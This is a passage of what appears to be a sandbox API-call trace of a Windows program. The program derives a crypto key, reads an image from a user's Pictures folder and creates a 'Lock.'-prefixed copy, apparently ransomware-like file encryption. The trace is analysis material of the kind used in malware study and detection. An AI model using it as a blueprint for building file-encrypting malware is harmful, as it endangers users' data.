lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0209.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab188, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0209.923] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1db8) returned 1 [0209.923] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.924] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.924] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.924] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.924] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0209.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0209.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0209.924] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0209.924] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.925] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/F3GpsjDs7t.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f3gpsjds7t.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0209.926] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.926] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0209.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.926] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0209.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0209.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74538 [0209.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.927] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0209.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74538 | out: hHeap=0x2af0000) returned 1 [0209.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0209.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a938 [0209.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0209.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.F3GpsjDs7t.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.f3gpsjds7t.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0209.929] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.929] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0209.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0209.936] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.936] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.936] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.937] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0209.937] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x50ea020 [0209.940] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0209.940] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0209.943] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x265e, lpOverlapped=0x0) returned 1 [0209.943] ReadFile (in: hFile=0x520, lpBuffer=0x2a7a930, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a930*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0209.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.943] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.943] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1265e) returned 0x2aae878 [0209.945] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ea020 | out: hHeap=0x2af0000) returned 1 [0209.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0209.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.947] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0209.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0209.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0209.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1265e) returned 0x2ac0ee0 [0209.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.988] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0209.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1265e) returned 0x2aae878 [0209.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0209.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0209.990] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0209.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1265e) returned 0x2aae878 [0209.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0209.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0209.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0209.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1265e) returned 0x37c0048 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0209.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0209.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0209.996] 